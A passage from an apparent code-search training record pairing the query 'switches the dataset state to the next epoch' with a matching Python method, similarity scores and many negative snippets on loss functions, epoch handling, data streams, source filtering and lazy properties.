= _eucl_loss\n losses[\"weight_stage5_L2\"] = _eucl_loss\n losses[\"weight_stage6_L1\"] = _eucl_loss\n losses[\"weight_stage6_L2\"] = _eucl_loss\n\n return losses", "def get_loss(self):\n return self.loss / self.cnt", "def get_loss_fn(kind):\n if kind == 'classic':\n loss_fn = classic_gan_losses\n elif kind == 'nonsaturating':\n loss_fn = nonsaturating_gan_losses\n elif kind == 'wasserstein':\n loss_fn = wasserstein_gan_losses\n elif kind == 'hinge':\n loss_fn = hinge_gan_losses\n return loss_fn", "def compute_loss(self):", "def get_loss_function(loss):\n if loss is None or isinstance(loss, losses.Loss):\n return loss\n\n if tf_inspect.isclass(loss) and issubclass(loss, losses.Loss):\n # It is not safe to assume that the loss takes no constructor arguments.\n raise ValueError(\n 'Received uninstantiated Loss class: {}\\nPlease call loss \"\"classes '\n 'before passing them to Model.compile.'.format(loss))\n\n # Deserialize loss configuration, if needed.\n if isinstance(loss, collections.abc.Mapping):\n loss = losses.get(loss)\n\n # Custom callable class.\n if callable(loss) and not hasattr(loss, '__name__'):\n return loss\n\n # Wrap loss function with signature `(y_true, y_pred, **kwargs)`\n # in `LossFunctionWrapper` class.\n loss_fn = losses.get(loss)\n\n # For losses which are given as strings/functions in the compile API,\n # we always set the loss reduction type to be `SUM_OVER_BATCH_SIZE`\n # (both in distribution strategy context and otherwise).\n return losses.LossFunctionWrapper(\n loss_fn,\n name=loss_fn.__name__,\n reduction=losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE)", "def compute_loss(self):\n self.prototypes = self.compute_prototypes()\n self.test_logits = self.compute_logits()\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.episode.test_labels, logits=self.test_logits)\n cross_entropy_loss = tf.reduce_mean(loss)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy_loss + self.weight_decay * regularization\n return loss", "def check_loss(self, loss):\r\n if loss in loss_functions:\r\n return loss\r\n else:\r\n raise InvalidNeuralNetwork()", "def _get_loss_fn(self):\n msg = (\n \"Abstract class: _get_loss_fn() must be implemented by a child \"\n \"class of Classifier.\"\n )\n raise NotImplementedError(msg)", "def get_loss(name: str):\n if name == 'mse' or name is None:\n loss = nn.MSELoss()\n elif name == 'cp':\n loss = CosineProximityLoss()\n elif name == 'mae':\n loss = nn.L1Loss()\n elif name == 'bce':\n loss = nn.BCEWithLogitsLoss()\n else:\n raise ValueError(f'Loss function {name} not supported.')\n return loss", "def compute_loss(self):\n def calc_loss(inputs, outputs):\n reconstruction_loss = tf.metrics.binary_crossentropy(\n tf_flat(inputs), tf_flat(outputs))\n reconstruction_loss *= OUT_SIZE * OUT_SIZE\n kl_loss = -0.5 * tf.reduce_sum(1.0 + self.log_sigma - tf.square(\n self.mu) - tf.exp(self.log_sigma), 1)\n return tf.reduce_mean(reconstruction_loss + kl_loss)\n return calc_loss", "def ml_loss(self, c1=1.0):\n loss = MLLoss(c1)\n return loss.lossFunction", "def loss(self):\n if not self.run:\n self._run()\n return self.model_loss", "def compute_loss(self, features, mode, params, precomputed):\n raise NotImplementedError(\"Model does not implement loss.\")", "def get_loss_fn(num_classes):\n def classification_loss_fn(labels, logits):\n \"\"\"Classification loss.\"\"\"\n labels = tf.squeeze(labels)\n log_probs = tf.nn.log_softmax(logits, axis=-1)\n one_hot_labels = tf.one_hot(tf.cast(labels, dtype=tf.int32), depth=num_classes, dtype=tf.float32)\n per_example_loss = -tf.reduce_sum(tf.cast(one_hot_labels, dtype=tf.float32) * log_probs, axis=-1)\n return tf.reduce_mean(per_example_loss)\n return classification_loss_fn" ]
[ "0.7495766", "0.7134641", "0.70509577", "0.7038898", "0.6990812", "0.6928303", "0.6885967", "0.68388313", "0.6784255", "0.6783532", "0.67699516", "0.6748856", "0.672302", "0.66822994", "0.66506594", "0.6647998", "0.6568442", "0.6567009", "0.65539795", "0.65407044", "0.6529401", "0.6500925", "0.64968306", "0.6443255", "0.6425503", "0.64233994", "0.64153904", "0.63983357", "0.6352483", "0.63523537" ]
0.77475625
0
Switches the dataset state to the next epoch. The default implementation for this method is to reset the state. Returns
def next_epoch(self, state): return self.reset(state)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def new_epoch(self):\n self._curr_batch = 0\n if self.shuffle_order:\n self.shuffle()", "def _reset(self):\n np.random.shuffle(self.id)\n self.episode_step = 0 # Reset episode step counter at the end of every episode\n self._state = self.X_train[self.id[self.episode_step]]\n self._episode_ended = False\n\n return ts.restart(self._state)", "def reset_epoch(self):\n self.ix = 0", "def __new_epoch(self):\n self.epoch += 1\n indices = np.arange(self.data.shape[0])\n np.random.shuffle(indices)\n self.q = list(indices)", "def reset(self):\n # Initialize the timestep\n self.timestep = 0\n self.state = self.starting_state\n\n if self.from_data:\n self.episode_num += 1\n\n\n return self.starting_state", "def new_epoch(self):\n temp = list(zip(self.images_names, self.labels_names))\n random.shuffle(temp)\n self.images_names, self.labels_names = zip(*temp)\n self.pos = 0\n self.CL.reset(self.images_names, self.labels_names)", "def _epoch_before_hook(self):\n self._train_steps_this_epoch = 0", "def train_one_epoch(self):\n raise NotImplementedError", "def on_epoch_end(self):\n if self.shuffle:\n self.dataset_df = skl_shuffle(self.dataset_df)", "def set_train_epoch(self, epoch: int):\n if hasattr(self, 'cls_head'):\n self.cls_head.set_train_epoch(epoch)", "def on_epoch_start(self):\n self.current_epoch += 1\n self.current_lr = self.fn(self.current_epoch)\n self.model.set_learning_rate(self.current_lr)\n self.epochs += [self.current_epoch]\n self.learning_rate += [self.current_lr]", "def cur_epoch(self, epoch: int):\n # allow setter for training resumption\n self._cur_epoch = epoch", "def reset(self, batch_size=None, is_new_epoch=False):\n if is_new_epoch:\n self.epoch += 1\n\n self.batch_sampler.reset(batch_size, epoch=self.epoch)", "def changeEpochs(self,epochs):\n self.epochs = epochs", "def set_epoch(self, epoch):\r\n pass", "def reset(self):\n self.epochs = 0\n # Shuffle the training data\n perm = np.arange(self.num_train)\n np.random.shuffle(perm)\n assert self.num_train == self.train_images.shape[\n 0], 'Error incorrect shuffling mask'\n self.train_images = self.train_images[perm]\n self.train_labels = self.train_labels[perm]\n self.curr_train_index = 0", "def set_train_epoch(self, epoch: int):\n self._train_epoch = epoch", "def before_training_epoch(self, epoch, **kw):\n self.current_row = {MetricName(\"epoch\"): epoch}", "def set_epoch(self, epoch):\n self.epoch = epoch", "def step(self, epoch):\n\n self.train(epoch)\n self.test(epoch)", "def before_train_epoch(self, runner):\n recipe = self.schedule.get(runner.epoch + 1, None)\n if recipe is not None:\n self._do_switch(runner, recipe, f' at epoch {runner.epoch + 1}')", "def update_train_state(self):\n\n # Save one model at least\n if self.train_state['epoch_index'] == 0:\n # torch.save(self.classifier.state_dict(), self.train_state['model_filename'])\n self.save_model()\n self.train_state['stop_early'] = False\n\n # Save model if performance improved\n elif self.train_state['epoch_index'] >= 1:\n loss_tm1, loss_t = self.train_state['val_loss'][-2:]\n\n # If loss worsened\n if loss_t >= self.train_state['early_stopping_best_val']:\n # Update step\n self.train_state['early_stopping_step'] += 1\n # Loss decreased\n else:\n # Save the best model\n if loss_t < self.train_state['early_stopping_best_val']:\n self.save_model()\n self.train_state['early_stopping_best_val'] = loss_t\n\n # Reset early stopping step\n self.train_state['early_stopping_step'] = 0\n\n # Stop early ?\n self.train_state['stop_early'] = \\\n self.train_state['early_stopping_step'] >= self.args.early_stopping_criteria", "def step_begin_epoch(self, epoch):\n self.lr = self.get_next_lr(epoch)\n self.optimizer.set_lr(self.warmup_factor * self.lr)\n return self.optimizer.get_lr()", "def train_epoch(self):\r\n for loader in self.loaders:\r\n if self.epoch % loader.epoch_interval == 0:\r\n self.cycle_dataset(loader)\r\n\r\n self._stats_new_epoch()\r\n self._write_tensorboard()\r\n print('{}th epoch train / eval done!'.format(self.epoch))", "def epoch_start(self, epoch):\n self.epoch = epoch", "def train_epoch(self):\n for batch, targets in self.training_dataloader:\n self.training_step(batch, targets)\n self.calculate_training_loss()\n self.epochs_trained += 1\n LOGGER.info(\n \"Training loss after {} epochs: {}\".format(str(self.epochs_trained), str(self.training_average_loss))\n )", "def _set_current_step(self, epoch: int):\n self._cur_step = epoch * self._steps_per_epoch", "def reset_epoch_cache(self):\n self.epoch_cache = {\"train\":PerformanceBatch(), \n \"val\":PerformanceBatch(), \n \"test\":PerformanceBatch()}", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError" ]
[ "0.73462296", "0.69393736", "0.6755204", "0.6629461", "0.6506496", "0.646609", "0.6465896", "0.6438578", "0.6374113", "0.6371389", "0.6335564", "0.63048464", "0.628498", "0.6273848", "0.62642074", "0.6264049", "0.6257736", "0.6157545", "0.6111303", "0.60934657", "0.6084503", "0.6049696", "0.60476315", "0.6043031", "0.6039409", "0.60383385", "0.6033077", "0.5998931", "0.59951043", "0.59951043" ]
0.7705791
0
Use the default iteration scheme to construct a data stream.
def get_default_stream(self): if not hasattr(self, 'default_scheme'): raise ValueError("Dataset does not provide a default iterator") return DataStream(self, iteration_scheme=self.default_scheme)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_data_iterator(input):\n assert isinstance(input, DataLoader)\n data_iterator = iter(input)\n return data_iterator", "def __iter__(self):\n\n # Open the data reader\n self.data.open()\n\n starts = np.arange(self.start, self.stop, self.chunksize)\n for a, b in zip_longest(starts, starts[1:], fillvalue=self.stop):\n yield self.data.read(a, b, **self.kwargs)", "def __iter__(self):\n for sample in self.data:\n yield sample", "def one_shot_iterator(dataloader):\n while True:\n for data in dataloader:\n yield data", "def __iter__(self):\n for i in range(len(self.data)):\n yield self.data[i]", "def __iter__(self):\n return self.stream_chunker", "def cohere_stream(stream):\n if isinstance(stream, IterIO):\n return stream\n return IterIO(stream)", "def __iter__(self):\n return iter(self.data)", "def __iter__(self):\n return iter(self.data)", "def __iter__(self):\n return iter(self.data)", "def __iter__(self):\r\n return iter(self.data)", "def __init__(self, iterable_creator, size=None):\n super(IterStream, self).__init__()\n self.iterable_creator = iterable_creator\n self.size = size\n # logging.debug('IterStream.size is {0}'.format(self.size))\n self.reset()", "def data_next(self, *args, **kwargs):\n # there is this nasty tradeoff where if you implement this in this way\n # where data can take arguments, then _any_ downstream artifact that you\n # want also has to take those arguments as well, clearly undesireable\n # in cases where you would like to be able to do the transformation\n # without having to haul a bunch of stuff around with you\n # what this means is that either you have to accept a set of defaults that\n # are sane and will get you what you want, you identifier is incomplete and\n # thus you add arguments to your function to flesh it out, or\n # you have to drop down a level, configure your argument ahead of time\n # and then make the request again with slightly differen types\n\n # allowing the underlying abstraction to bubble up into optional kwarsg\n # frankly seems like a pretty good option, if it werent for the fact that\n # it is an absolute pain to maintain in the absense of mimicArgs\n # I feel like cl generics could make this much easier ...\n\n # OR OR OR the graph is successor stream of the actual instantiation of this stream\n # which means that ... the extra args would go in at init time??? no\n # that doesn't seem like the right tradeoff, any successor streams\n # basically have to present kwargs for any variables that cannot be\n # set to a sane default within the scope of the identifier system (sigh)\n # or at least in cases where it hasn't been demostrated that the variables\n # are simply a matter of representaiton, not differences in information\n # (i.e. that there isn't a function that can 1:1 interconvert)\n\n generator = self.metadata().data_next(yield_response_gen=True, **kwargs)\n format, *header_chunks, (resp, gen) = generator\n self.headers = resp.headers\n self.format = format\n # TODO populate header graph? not sure this is actually possible\n # maybe need to double wrap so that the header chunks always get\n # consumbed by the header object ?\n if self.format == 'application/rdf+xml':\n resp.close()\n return None\n\n return chain(header_chunks, gen)", "def data_generator(f):\n def g(*a, **kw):\n return data_iter(f(*a, **kw))\n return g", "def __iter__(self):\n\t\tfor i, data in enumerate(self.dataloader):\n\t\t\tif i * self.opt.batch_size >= self.opt.max_dataset_size:\n\t\t\t\tbreak\n\t\t\tyield data", "def __iter__(self):\n for i, data in enumerate(self.dataloader):\n if i * self.opt.batch_size >= self.opt.max_dataset_size:\n break\n yield data", "def __iter__(self) -> Union[Iterator[int], Iterator[Tuple[int, Any]]]:\n self.size = self._data._dataset_size\n if (not self._data._fully_cached or\n self._data._should_call_prefetch_source):\n self._data._start_iteration()\n # First epoch of lazy loading, calling prefetch, and returning\n # indices and examples.\n iterator = self._iterator_unknown_size()\n else:\n # Non-lazy loading, or when dataset has been fully iterated.\n assert self.size is not None\n iterator = self._iterator_given_size(self.size)\n\n if self._data._should_call_prefetch_processed:\n # Processing routine is performed in main process. Yield\n # processed examples instead.\n map_fn = lambda idx: (idx, self._data._processed_cache[idx])\n elif self._data._should_yield_raw_example:\n # Return indices and examples for any epoch in this case.\n map_fn = lambda idx: (idx, self._data._source[idx])\n else:\n map_fn = None # type: ignore\n if map_fn is not None:\n return map(map_fn, iterator)\n\n return iterator", "def _make_dataset_iterator(self, dataset):\n # Note that split_batch_by argument is not passed because it is always 1 in\n # this strategy, and adding it adds unnecessary overhead to the dataset.\n return input_lib_v1.DatasetIterator(dataset, self._input_workers,\n self._container_strategy())", "def on_iterate(self, data: Any = None):\n raise NotImplementedError", "def __iter__(self):\n for data in self._iterable_data:\n yield self.transform(data)", "def data_stream(self, x=[], y=[]):\n xy = np.zeros((self.numpoints,2))\n i = 0\n while True:\n xy[i,0]=x[i];xy[i,1]=y[i]\n i = (i+1) % self.numpoints\n yield np.c_[xy[:,0], xy[:,1]]", "def __iter__(self):\n for item in self._reader:\n yield item", "def __iter__(self):\n for datum in self.data[self.name]:\n yield datum", "def __iter__(self):\n return self.new_generator()", "def stream(self, **stream_options):\n return stream_generator(self.new, **stream_options)", "def init_iterable(self, inp):\n inp = make_iter(inp)\n nsize = len(inp)\n self._npages = nsize // self.height + (0 if nsize % self.height == 0 else 1)\n self._data = inp", "def __init__(self, iterator):\n self.iterator = []\n while iterator.hasNext():\n self.iterator.append(iterator.next())", "def __iter__(self):\n with self.handler as handler:\n if self.shuffle:\n # load all samples into memory\n samples = []\n while True:\n sample = handler.read()\n if sample is None:\n break\n sample = self.transform(sample)\n samples.append(sample)\n random.shuffle(samples)\n for sample in samples:\n yield sample\n else:\n # lazy-loading mode\n while True:\n sample = handler.read()\n if sample is None:\n break\n sample = self.transform(sample)\n yield sample", "def __init__(self, iterator):\n super().__init__(iterator,\n join=lambda x: x, empty=lambda x: [],\n init=lambda content, index: content)", "def __iter__(self) -> Iterator:\n return iter(self.get_data_loader())" ]
[ "0.6576385", "0.6544374", "0.63232946", "0.6247353", "0.6233099", "0.62073475", "0.618729", "0.61413085", "0.61413085", "0.61413085", "0.61316687", "0.60305387", "0.6023972", "0.6003705", "0.5974357", "0.5966117", "0.5944801", "0.594095", "0.5936904", "0.59299433", "0.59298265", "0.59144247", "0.59139335", "0.59042704", "0.5890689", "0.58767956", "0.58674407", "0.58559704", "0.5846868", "0.58427656" ]
0.6743139
0
Filter the requested sources from those provided by the dataset. A dataset can be asked to provide only a subset of the sources it can provide (e.g. asking MNIST only for the features, not for the labels). A dataset can choose to use this information to e.g. only load the requested sources into memory. However, in case the performance gain of doing so would be negligible, the dataset can load all the data sources and then use this method to return only those requested.
def filter_sources(self, data): return tuple([d for d, s in zip(data, self.provides_sources) if s in self.sources])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_new_sourcedatasets(self):\n previous_study_version = self.get_previous_version()\n SourceDataset = apps.get_model('trait_browser', 'SourceDataset')\n if previous_study_version is not None:\n qs = SourceDataset.objects.filter(source_study_version=self)\n # We can probably write this with a join to be more efficient.\n previous_dataset_accessions = SourceDataset.objects.filter(\n source_study_version=previous_study_version\n ).values_list('i_accession', flat=True)\n qs = qs.exclude(i_accession__in=previous_dataset_accessions)\n return qs\n else:\n return SourceDataset.objects.none()", "def getSourceSubset(self, selection=None):\n if not selection or selection.lower() == \"all\":\n return self.sources\n # sort by brightness\n from past.builtins import cmp\n from functools import cmp_to_key\n srclist0 = sorted(self.sources, key=cmp_to_key(lambda a, b: cmp(b.brightness(), a.brightness())))\n all = set([src.name for src in srclist0])\n srcs = set()\n for ispec, spec in enumerate(re.split(\"\\s+|,\", selection)):\n spec = spec.strip()\n if spec:\n # if first spec is a negation, then implictly select all sources first\n if not ispec and spec[0] in \"!-\":\n srcs = all\n if spec.lower() == \"all\":\n srcs = all\n elif self._re_bynumber.match(spec):\n negate, start, end = self._re_bynumber.match(spec).groups()\n sl = slice(int(start) if start else None, int(end) if end else None)\n if negate:\n srcs.difference_update([src.name for src in srclist0[sl]])\n else:\n srcs.update([src.name for src in srclist0[sl]])\n elif spec.startswith(\"-=\") or spec.startswith(\"!=\"):\n srcs.difference_update([src.name for src in srclist0 if getattr(src, spec[2:], None)])\n elif spec.startswith(\"=\"):\n srcs.update([src.name for src in srclist0 if getattr(src, spec[1:], None)])\n elif spec.startswith(\"-\") or spec.startswith(\"!\"):\n srcs.discard(spec[1:])\n else:\n srcs.add(spec)\n # make list\n return [src for src in srclist0 if src.name in srcs]", "def get_diffuse_sources(self, src_sel):\n extended = self._select_and_freeze(self.extended_sources, src_sel)\n for s in extended: # this seems redundant, but was necessary\n s.model.free[:] = False if src_sel.frozen(s) else s.free[:]\n sources.validate(s,self.nside, None)\n s.smodel = s.model\n \n return self.get_global_sources(src_sel.skydir()), extended", "def get_data_sources(self) -> [DataSource]:\n return []", "def findsources(self, *args, **kwargs):\n return _image.image_findsources(self, *args, **kwargs)", "def filter_dataset(source_path, dataset_path, progress_bar, info_label, progress, root):\n # dictionary to store two source path\n source_path_name = {}\n for d in SUB_DIRS:\n source_path_name[f\"{d}\"] = os.path.join(source_path, d)\n\n if not os.path.exists(source_path + \"/\" + SUB_DIRS[0]) and not os.path.exists(source_path + \"/\" + SUB_DIRS[1]):\n messagebox.showerror(\"Message\", \"Please check whether source directory, \\n \\\n must contain 'attentive' and 'not_attentive' dataset\")\n else:\n attentive = set()\n not_attentive = set()\n\n total_img = len(os.listdir(source_path + \"/\" + SUB_DIRS[0])) + len(os.listdir(source_path + \"/\" + SUB_DIRS[1]))\n i = 0\n\n # for attentive images in format particular format and availability of face\n for image in os.listdir(source_path + \"/\" + SUB_DIRS[0]):\n if len(image.split(\".\")) == 2 and image.split(\".\")[1] in IMG_FORMAT \\\n and check_availability(source_path + \"/\" + SUB_DIRS[0] + \"/\" + image):\n attentive.add(image)\n i += 1\n progress_bar['value'] = int((i / total_img) * 100)\n progress.update()\n\n info_label['text'] = 'Not Attentive set filtering is on progress'\n\n # for not attentive images\n for image in os.listdir(source_path + \"/\" + SUB_DIRS[1]):\n if len(image.split(\".\")) == 2 and image.split(\".\")[1] in IMG_FORMAT \\\n and check_availability(source_path + \"/\" + SUB_DIRS[1] + \"/\" + image):\n not_attentive.add(image)\n i += 1\n progress_bar['value'] = int((i / total_img) * 100)\n progress.update()\n\n info_label['text'] = 'Filtering is completed'\n progress.destroy()\n\n attentive, not_attentive = list(attentive), list(not_attentive)\n\n if len(attentive) > 200 and len(not_attentive) > 200:\n next_page_interface(source_path_name, dataset_path, attentive, not_attentive, root)\n else:\n messagebox.showerror(\"Message\", \"Valid Image Count Is Less Than 100\")", "def get_data_sources(self):\n d = {}\n for k, connector in self.target_model.datasets().items():\n\n if not connector.uses_dataset_discovery:\n continue\n\n# can foxglove eval on demand or is this needed?\n# # force dataset to load, this will ensure dataset discovery has evaluated\n# # connection parameters.\n# assert connection.data\n d[k] = connector.engine_params\n return d", "def find_sources(data_dir, mode='training', shuffle=True):\n raise NotImplementedError", "def get_point_sources(self, src_sel):\n return self._select_and_freeze(self.point_sources, src_sel)", "def _source_filter(self):\n param_id = self._detect_source_params()\n cls_str = self._detect_source_param_class(param_id)\n if cls_str is None:\n raise ProfileError(\"parameter '%s' isn't defined in config\" %\n param_id)\n else:\n self.logger.debug(\"==> source objects class is '%s'\" % cls_str)\n cls = globals()[cls_str]\n instance = cls(param_id, \"$\", self.config[\"source\"][\"objects\"])\n return instance.get_pattern()", "def source_list(self):\n return [\n source.Name for source in self.coordinator.data.sources if not source.Hidden\n ]", "def query_initial_sources(self):\n self.search_thread_pool.waitForDone(0)\n # self.init_vector_layers()\n username, password, api_key, max_items_to_return = SettingsOps.get_settings()\n errors = []\n SettingsOps.validate_stored_info(username, password, api_key, max_items_to_return, errors)\n if len(errors) == 0:\n source_runnable = SourceRunnable(username, password, api_key, DEFAULT_ORDER_PARAMS)\n source_runnable.source_object.task_complete.connect(self.on_new_source)\n self.init_progress_bar()\n self.search_thread_pool.start(source_runnable)", "def get_sources(self, sources=None):\n\n if sources is None:\n with open(self.path, 'r') as infile:\n keys = list(json.loads(next(infile)).keys())\n sources = [\n k for k in keys\n ] + [\n 'raw_' + k for k in keys\n ] + [\n k + '_length' for k in keys\n ]\n\n elif not isinstance(sources, (list, tuple)):\n sources = [sources]\n\n for source in sources:\n if source not in self.sources:\n raise KeyError(\n 'Invalid data key: {}. Valid keys are: {}'.format(\n source, ', '.join(str(k) for k in self.sources.keys())\n ))\n\n return {k : self.sources[k] for k in sources}", "def select_sources(cat_table, cuts):\n nsrc = len(cat_table)\n full_mask = np.ones((nsrc), bool)\n for cut in cuts:\n if cut == 'mask_extended':\n full_mask *= mask_extended(cat_table)\n elif cut == 'select_extended':\n full_mask *= select_extended(cat_table)\n else:\n full_mask *= make_mask(cat_table, cut)\n\n lout = [src_name.strip() for src_name in cat_table['Source_Name'][full_mask]]\n return lout", "def _load_sources(self):\n ss_dir = SteelScriptDir('AppResponse', 'files')\n\n for svc in [PACKETS_REPORT_SERVICE_NAME,\n GENERAL_REPORT_SERVICE_NAME]:\n svc_version = self.appresponse.versions[svc]\n sw_version = (self.appresponse.get_info()['sw_version']\n .replace(' ', ''))\n sources_filename = ('{}-sources-{}-{}.pcl'\n .format(svc, svc_version, sw_version))\n sources_file = ss_dir.get_data(sources_filename)\n\n sources_file.read()\n\n if not sources_file.data:\n svcdef = self.appresponse.find_service(svc)\n\n # sources is a list of dictionaries\n sources = svcdef.bind('sources').execute('get').data['items']\n\n # the whole set of sources for current service\n all_sources = {}\n\n for source in sources:\n cols = source['columns']\n source['columns'] = \\\n OrderedDict(sorted(zip(map(lambda x: x['id'], cols),\n cols)))\n source['filters_on_metrics'] = \\\n source['capabilities']['filters_on_metrics']\n if 'granularities' not in source:\n source['granularities'] = None\n\n all_sources[source['name']] = source\n\n if source['name'] in report_source_to_groups:\n self._sources[source['name']] = source\n\n # source_file writes the whole set of sources to disk\n sources_file.data = all_sources\n sources_file.write()\n logger.debug(\"Wrote sources data into {}\"\n .format(sources_filename))\n else:\n logger.debug(\"Loading sources data from {}\"\n .format(sources_filename))\n # Only load valid sources based on settings\n for k, v in sources_file.data.iteritems():\n if k in report_source_to_groups:\n self._sources[k] = v\n\n return", "def filter(self, filters):", "def filter_dsets_with_restrictions(datasets, restrictions):\n # collect the masks of the existing restrictions\n list_of_masks = [restriction.get_mask() for restriction in restrictions if restriction is not None]\n\n # create one mask from all the masks\n filtering_mask = logical_and_on_list_of_masks(list_of_masks)\n\n # apply the final mask to all the datasets in the dictonary\n if filtering_mask is not None:\n return utils.filter_dictionary_by_mask(datasets, filtering_mask)\n\n return datasets", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url(self.study.pk)\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url(self.study.pk)\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url(self.study.pk)\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def get_sources(**kwargs):\n\n instance = Ceic._get_instance()\n\n get_dictionaries_method = instance._dictionary_facade.get_sources\n result = instance._make_request(get_dictionaries_method, **kwargs)\n\n return result", "def _load_filter(self, *args, **kwargs):\n raise NotImplementedError", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url()\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url()\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url()\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def _exhaust_sources(self):\n return self._exhaust_sinks(False)", "def fetch_data(self, begin=None, end=None, delete_rawdata=None):\n\n if delete_rawdata is None:\n delete_rawdata = self.delete_rawdata\n\n for source in self.sources.keys():\n if source in self.staticsources:\n continue\n src = self.sources[source]\n print '[INFO] Download data for source ' + source\n src.download_and_resample(begin=begin, end=end,\n shapefile=self.shapefile,\n delete_rawdata=delete_rawdata)\n\n print '[SUCCESS] Download and resampling complete!'", "async def _async_build_source_set(self) -> set[IPv4Address]:\n adapters = await network.async_get_adapters(self._hass)\n sources: set[IPv4Address] = set()\n if network.async_only_default_interface_enabled(adapters):\n sources.add(IPv4Address(\"0.0.0.0\"))\n return sources\n\n return {\n source_ip\n for source_ip in await network.async_get_enabled_source_ips(self._hass)\n if not source_ip.is_loopback and not isinstance(source_ip, IPv6Address)\n }", "def get_data_source_by_user(self, username: str = None, id: int = None):\n all_data_sources_from_user_array = []\n user = None\n try:\n try:\n if username is not None:\n user = dict_to_model(\n User, UserService.get_user_by_username(self, username))\n elif id is not None:\n user = dict_to_model(User,\n UserService.get_user_by_id(self, id))\n except Exception:\n raise\n\n if user is not None:\n for data_source in DataSource.select(\n DataSource, user).where(DataSource.user == user):\n all_data_sources_from_user_array.append(\n model_to_dict(data_source))\n return all_data_sources_from_user_array\n except Exception:\n raise", "def query_sources(self, search_params):\n self.search_thread_pool.waitForDone(0)\n # self.init_vector_layers()\n # clear out old models\n self.dialog_base.data_sources_list_view.setModel(None)\n self.dialog_base.geometry_list_view.setModel(None)\n self.dialog_base.types_list_view.setModel(None)\n self.sources.clear()\n self.geometries.clear()\n self.types_dict.clear()\n self.items.clear()\n self.written_first_line = False\n self.written_first_point = False\n self.written_first_polygon = False\n\n username, password, api_key, max_items_to_return = SettingsOps.get_settings()\n if VectorsProcessForm.validate_stored_settings(self.iface, username, password, api_key, max_items_to_return):\n source_runnable = SourceRunnable(username, password, api_key, search_params)\n source_runnable.source_object.task_complete.connect(self.on_new_source)\n self.init_progress_bar()\n self.search_thread_pool.start(source_runnable)" ]
[ "0.6109405", "0.6090112", "0.59479564", "0.58847076", "0.5806422", "0.56509817", "0.5643852", "0.5635574", "0.5618711", "0.5561764", "0.55469316", "0.5468559", "0.5457959", "0.54406905", "0.5426888", "0.53734815", "0.53640324", "0.5352967", "0.5352967", "0.5352967", "0.5322468", "0.5303992", "0.53022915", "0.53022915", "0.53022915", "0.52907467", "0.52845645", "0.52761704", "0.5262737", "0.52453995" ]
0.69611335
0
Create properties that perform lazy loading of attributes.
def lazy_property_factory(lazy_property): def lazy_property_getter(self): if not hasattr(self, '_' + lazy_property): self.load() if not hasattr(self, '_' + lazy_property): raise ValueError("{} wasn't loaded".format(lazy_property)) return getattr(self, '_' + lazy_property) def lazy_property_setter(self, value): setattr(self, '_' + lazy_property, value) return lazy_property_getter, lazy_property_setter
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lazy_properties(*lazy_properties):\n def lazy_property_factory(lazy_property):\n \"\"\"Create properties that perform lazy loading of attributes.\"\"\"\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter\n\n def wrap_dataset(dataset):\n if not issubclass(dataset, InMemoryDataset):\n raise ValueError(\"Only InMemoryDataset supports lazy loading\")\n\n # Attach the lazy loading properties to the class\n for lazy_property in lazy_properties:\n setattr(dataset, lazy_property,\n property(*lazy_property_factory(lazy_property)))\n\n # Delete the values of lazy properties when serializing\n if not hasattr(dataset, '__getstate__'):\n def __getstate__(self):\n serializable_state = self.__dict__.copy()\n for lazy_property in lazy_properties:\n attr = serializable_state.get('_' + lazy_property)\n # Iterators would lose their state\n if isinstance(attr, collections.Iterator):\n raise ValueError(\"Iterators can't be lazy loaded\")\n serializable_state.pop('_' + lazy_property, None)\n return serializable_state\n setattr(dataset, '__getstate__', __getstate__)\n\n return dataset\n return wrap_dataset", "def lazyprop(fn):\n\n @property\n def _lazyprop(self):\n if not hasattr(self, _LAZY_PROP_VALUES):\n setattr(self, _LAZY_PROP_VALUES, {})\n lazy_props_dict = self.__dict__[_LAZY_PROP_VALUES]\n if fn.__name__ not in lazy_props_dict:\n lazy_props_dict[fn.__name__] = fn(self)\n return lazy_props_dict[fn.__name__]\n\n return _lazyprop", "def lazy(fn):\n attr_name = '_lazy_' + fn.__name__\n @property\n def _lazyprop(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fn(self))\n return getattr(self, attr_name)\n return _lazyprop", "def load(self):\n for prop in self.properties:\n try:\n value = getattr(self, prop)\n self._prop_dict[prop] = value\n except AttributeError as ate:\n pass", "def property_setup(self, properties):\n return properties", "def get_properties():", "def auto_attr(func):\r\n return OneTimeProperty(func)", "def _collect_properties(self):\n properties = 